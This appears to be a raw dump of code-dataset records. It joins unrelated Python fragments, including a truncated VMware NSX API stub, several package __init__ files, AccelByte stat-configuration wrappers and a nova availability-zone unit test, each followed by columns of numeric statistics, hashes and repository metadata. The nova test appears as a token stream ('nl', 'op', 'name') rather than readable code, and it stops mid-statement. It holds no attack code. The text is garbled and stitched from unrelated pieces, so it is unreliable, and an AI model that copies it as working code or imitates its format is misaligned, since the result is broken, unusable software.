'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/status',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterRestoreStatus'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.status',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
    # Maps public attribute names to the client-facing stub classes of
    # this module; StubFactoryBase uses this table to lazily build stubs.
    _attrs = {
        'Backuptimestamps': Backuptimestamps,
        'Config': Config,
        'InstructionResources': InstructionResources,
        'Status': Status,
    }
| 41.591418
| 113
| 0.606513
| 2,203
| 22,293
| 5.91557
| 0.102587
| 0.069751
| 0.074816
| 0.092081
| 0.838321
| 0.826044
| 0.801565
| 0.785835
| 0.777087
| 0.761126
| 0
| 0.001125
| 0.282106
| 22,293
| 535
| 114
| 41.669159
| 0.813172
| 0.272731
| 0
| 0.640867
| 1
| 0
| 0.289155
| 0.196179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040248
| false
| 0
| 0.037152
| 0
| 0.136223
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db18b706bc57a72a791a6751e656e24579c1870e
| 218
|
py
|
Python
|
discord_exchange/orderbook/__init__.py
|
MiltFra/discord-exchange
|
66764a22b74a09ab2f8704884164a5deadddb17a
|
[
"Apache-2.0"
] | null | null | null |
discord_exchange/orderbook/__init__.py
|
MiltFra/discord-exchange
|
66764a22b74a09ab2f8704884164a5deadddb17a
|
[
"Apache-2.0"
] | null | null | null |
discord_exchange/orderbook/__init__.py
|
MiltFra/discord-exchange
|
66764a22b74a09ab2f8704884164a5deadddb17a
|
[
"Apache-2.0"
] | null | null | null |
from discord_exchange.orderbook.orderbook import Orderbook
from discord_exchange.orderbook.user_data import UserData
from discord_exchange.orderbook.order import Order
from discord_exchange.orderbook.trade import Trade
| 54.5
| 58
| 0.894495
| 29
| 218
| 6.551724
| 0.344828
| 0.231579
| 0.4
| 0.589474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068807
| 218
| 4
| 59
| 54.5
| 0.935961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
db2d2667db841a75c415bcc5fd4a5ebbf0b5497c
| 273
|
py
|
Python
|
pyamg/amg_core/tests/__init__.py
|
TareqZaman/pyamg
|
ece7eb38632b5d4618ec4959a23a2ab9956dc232
|
[
"MIT"
] | 371
|
2015-01-11T23:32:12.000Z
|
2022-03-31T12:47:56.000Z
|
pyamg/amg_core/tests/__init__.py
|
TareqZaman/pyamg
|
ece7eb38632b5d4618ec4959a23a2ab9956dc232
|
[
"MIT"
] | 169
|
2015-01-15T15:31:10.000Z
|
2022-03-29T23:03:35.000Z
|
pyamg/amg_core/tests/__init__.py
|
TareqZaman/pyamg
|
ece7eb38632b5d4618ec4959a23a2ab9956dc232
|
[
"MIT"
] | 100
|
2015-01-22T23:21:23.000Z
|
2022-03-22T10:26:41.000Z
|
from .bind_examples import (test1, test2, test3, test4, test5,
test6, test7, test8, test9, test10)
# Public API: re-export the ten bind_examples test functions imported above.
__all__ = [f"test{i}" for i in range(1, 11)]
| 17.0625
| 63
| 0.483516
| 25
| 273
| 5.08
| 0.6
| 0.15748
| 0.23622
| 0.314961
| 0.80315
| 0.80315
| 0.80315
| 0.80315
| 0.80315
| 0.80315
| 0
| 0.124294
| 0.351648
| 273
| 15
| 64
| 18.2
| 0.59322
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e1e592caeec8ec166cfd2f5ba2db210ff783af8f
| 10,981
|
py
|
Python
|
accelbyte_py_sdk/api/social/wrappers/_stat_configuration.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/social/wrappers/_stat_configuration.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/social/wrappers/_stat_configuration.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ErrorEntity
from ..models import StatCreate
from ..models import StatImportInfo
from ..models import StatInfo
from ..models import StatPagingSlicedResult
from ..models import StatUpdate
from ..operations.stat_configuration import CreateStat
from ..operations.stat_configuration import CreateStat1
from ..operations.stat_configuration import DeleteStat
from ..operations.stat_configuration import ExportStats
from ..operations.stat_configuration import GetStat
from ..operations.stat_configuration import GetStats
from ..operations.stat_configuration import ImportStats
from ..operations.stat_configuration import QueryStats
from ..operations.stat_configuration import UpdateStat
from ..models import StatCreateSetByEnum
from ..models import StatInfoSetByEnum, StatInfoStatusEnum
@same_doc_as(CreateStat)
def create_stat(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Fall back to the SDK-configured namespace when the caller gave none;
    # propagate the (None, error) pair on failure, matching the SDK contract.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = CreateStat.create(body=body, namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(CreateStat)
async def create_stat_async(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of create_stat: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = CreateStat.create(body=body, namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateStat1)
def create_stat_1(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = CreateStat1.create(body=body, namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(CreateStat1)
async def create_stat_1_async(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of create_stat_1: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = CreateStat1.create(body=body, namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteStat)
def delete_stat(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = DeleteStat.create(stat_code=stat_code, namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(DeleteStat)
async def delete_stat_async(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of delete_stat: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = DeleteStat.create(stat_code=stat_code, namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportStats)
def export_stats(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = ExportStats.create(namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(ExportStats)
async def export_stats_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of export_stats: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = ExportStats.create(namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStat)
def get_stat(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = GetStat.create(stat_code=stat_code, namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(GetStat)
async def get_stat_async(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of get_stat: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = GetStat.create(stat_code=stat_code, namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStats)
def get_stats(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = GetStats.create(limit=limit, offset=offset, namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(GetStats)
async def get_stats_async(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of get_stats: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = GetStats.create(limit=limit, offset=offset, namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportStats)
def import_stats(file: Optional[Any] = None, replace_existing: Optional[bool] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = ImportStats.create(
        file=file,
        replace_existing=replace_existing,
        namespace=namespace,
    )
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(ImportStats)
async def import_stats_async(file: Optional[Any] = None, replace_existing: Optional[bool] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of import_stats: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = ImportStats.create(
        file=file,
        replace_existing=replace_existing,
        namespace=namespace,
    )
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryStats)
def query_stats(keyword: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = QueryStats.create(
        keyword=keyword,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(QueryStats)
async def query_stats_async(keyword: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of query_stats: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = QueryStats.create(
        keyword=keyword,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateStat)
def update_stat(stat_code: str, body: Optional[StatUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Resolve the SDK-wide namespace when not supplied by the caller.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = UpdateStat.create(stat_code=stat_code, body=body, namespace=namespace)
    return run_request(req, additional_headers=x_additional_headers, **kwargs)


@same_doc_as(UpdateStat)
async def update_stat_async(stat_code: str, body: Optional[StatUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of update_stat: identical request, awaited transport.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    req = UpdateStat.create(stat_code=stat_code, body=body, namespace=namespace)
    return await run_request_async(req, additional_headers=x_additional_headers, **kwargs)
| 37.606164
| 199
| 0.711866
| 1,318
| 10,981
| 5.729135
| 0.092564
| 0.121573
| 0.085816
| 0.057211
| 0.823864
| 0.772216
| 0.772216
| 0.772216
| 0.759767
| 0.759767
| 0
| 0.00124
| 0.192241
| 10,981
| 291
| 200
| 37.735395
| 0.850056
| 0.069757
| 0
| 0.742358
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039301
| false
| 0
| 0.126638
| 0
| 0.323144
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1f1e97858b823c06ab29d17dd2a2ca4c2749802
| 145
|
py
|
Python
|
loldib/getratings/models/NA/na_nasus/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_nasus_top import *
from .na_nasus_jng import *
from .na_nasus_mid import *
from .na_nasus_bot import *
from .na_nasus_sup import *
| 24.166667
| 28
| 0.758621
| 25
| 145
| 4
| 0.36
| 0.3
| 0.55
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 145
| 5
| 29
| 29
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c00e64af299c4f688916fc8c963d41d7f23c5907
| 25,349
|
py
|
Python
|
nova/tests/unit/test_availability_zones.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/test_availability_zones.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/test_availability_zones.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2013 Netease Corporation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
string|'"""\nTests for availability zones\n"""'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'import'
name|'six'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'availability_zones'
name|'as'
name|'az'
newline|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'db'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|AvailabilityZoneTestCases
name|'class'
name|'AvailabilityZoneTestCases'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test case for aggregate based availability zone."""'
newline|'\n'
nl|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'AvailabilityZoneTestCases'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'host'
op|'='
string|"'me'"
newline|'\n'
name|'self'
op|'.'
name|'availability_zone'
op|'='
string|"'nova-test'"
newline|'\n'
name|'self'
op|'.'
name|'default_az'
op|'='
name|'CONF'
op|'.'
name|'default_availability_zone'
newline|'\n'
name|'self'
op|'.'
name|'default_in_az'
op|'='
name|'CONF'
op|'.'
name|'internal_service_availability_zone'
newline|'\n'
name|'self'
op|'.'
name|'context'
op|'='
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'agg'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'az_agg'"
op|','
name|'self'
op|'.'
name|'availability_zone'
op|')'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db'
op|'.'
name|'aggregate_delete'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'agg'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
name|'super'
op|'('
name|'AvailabilityZoneTestCases'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_az
dedent|''
name|'def'
name|'_create_az'
op|'('
name|'self'
op|','
name|'agg_name'
op|','
name|'az_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agg_meta'
op|'='
op|'{'
string|"'name'"
op|':'
name|'agg_name'
op|'}'
newline|'\n'
name|'agg'
op|'='
name|'db'
op|'.'
name|'aggregate_create'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'agg_meta'
op|')'
newline|'\n'
nl|'\n'
name|'metadata'
op|'='
op|'{'
string|"'availability_zone'"
op|':'
name|'az_name'
op|'}'
newline|'\n'
name|'db'
op|'.'
name|'aggregate_metadata_add'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'agg'
op|'['
string|"'id'"
op|']'
op|','
name|'metadata'
op|')'
newline|'\n'
nl|'\n'
name|'return'
name|'agg'
newline|'\n'
nl|'\n'
DECL|member|_update_az
dedent|''
name|'def'
name|'_update_az'
op|'('
name|'self'
op|','
name|'aggregate'
op|','
name|'az_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'metadata'
op|'='
op|'{'
string|"'availability_zone'"
op|':'
name|'az_name'
op|'}'
newline|'\n'
name|'db'
op|'.'
name|'aggregate_update'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'aggregate'
op|'['
string|"'id'"
op|']'
op|','
name|'metadata'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_service_with_topic
dedent|''
name|'def'
name|'_create_service_with_topic'
op|'('
name|'self'
op|','
name|'topic'
op|','
name|'host'
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'binary'"
op|':'
string|"'bin'"
op|','
nl|'\n'
string|"'host'"
op|':'
name|'host'
op|','
nl|'\n'
string|"'topic'"
op|':'
name|'topic'
op|','
nl|'\n'
string|"'disabled'"
op|':'
name|'disabled'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'return'
name|'db'
op|'.'
name|'service_create'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'values'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_destroy_service
dedent|''
name|'def'
name|'_destroy_service'
op|'('
name|'self'
op|','
name|'service'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'service_destroy'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'service'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_add_to_aggregate
dedent|''
name|'def'
name|'_add_to_aggregate'
op|'('
name|'self'
op|','
name|'service'
op|','
name|'aggregate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'aggregate_host_add'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
name|'aggregate'
op|'['
string|"'id'"
op|']'
op|','
name|'service'
op|'['
string|"'host'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_delete_from_aggregate
dedent|''
name|'def'
name|'_delete_from_aggregate'
op|'('
name|'self'
op|','
name|'service'
op|','
name|'aggregate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'aggregate_host_delete'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
name|'aggregate'
op|'['
string|"'id'"
op|']'
op|','
name|'service'
op|'['
string|"'host'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rest_availability_zone_reset_cache
dedent|''
name|'def'
name|'test_rest_availability_zone_reset_cache'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'add'
op|'('
string|"'cache'"
op|','
string|"'fake_value'"
op|')'
newline|'\n'
name|'az'
op|'.'
name|'reset_cache'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'get'
op|'('
string|"'cache'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_update_host_availability_zone_cache
dedent|''
name|'def'
name|'test_update_host_availability_zone_cache'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test availability zone cache could be update."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a new aggregate with an AZ and add the host to the AZ'
nl|'\n'
name|'az_name'
op|'='
string|"'az1'"
newline|'\n'
name|'cache_key'
op|'='
name|'az'
op|'.'
name|'_make_cache_key'
op|'('
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'agg_az1'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az1'"
op|','
name|'az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'az'
op|'.'
name|'update_host_availability_zone_cache'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'az1'"
op|','
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'get'
op|'('
name|'cache_key'
op|')'
op|')'
newline|'\n'
name|'az'
op|'.'
name|'update_host_availability_zone_cache'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|','
string|"'az2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'az2'"
op|','
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'get'
op|'('
name|'cache_key'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_availability_zone_compute_service
dedent|''
name|'def'
name|'test_set_availability_zone_compute_service'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test for compute service get right availability zone."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'services'
op|'='
name|'db'
op|'.'
name|'service_get_all'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
nl|'\n'
comment|'# The service is not add into aggregate, so confirm it is default'
nl|'\n'
comment|'# availability zone.'
nl|'\n'
name|'new_service'
op|'='
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
name|'new_service'
op|'['
string|"'availability_zone'"
op|']'
op|')'
newline|'\n'
nl|'\n'
comment|'# The service is added into aggregate, confirm return the aggregate'
nl|'\n'
comment|'# availability zone.'
nl|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'new_service'
op|'='
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'new_service'
op|'['
string|"'availability_zone'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_destroy_service'
op|'('
name|'service'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_availability_zone_unicode_key
dedent|''
name|'def'
name|'test_set_availability_zone_unicode_key'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test set availability zone cache key is unicode."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'network'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'services'
op|'='
name|'db'
op|'.'
name|'service_get_all'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'services'
op|'['
number|'0'
op|']'
op|'['
string|"'host'"
op|']'
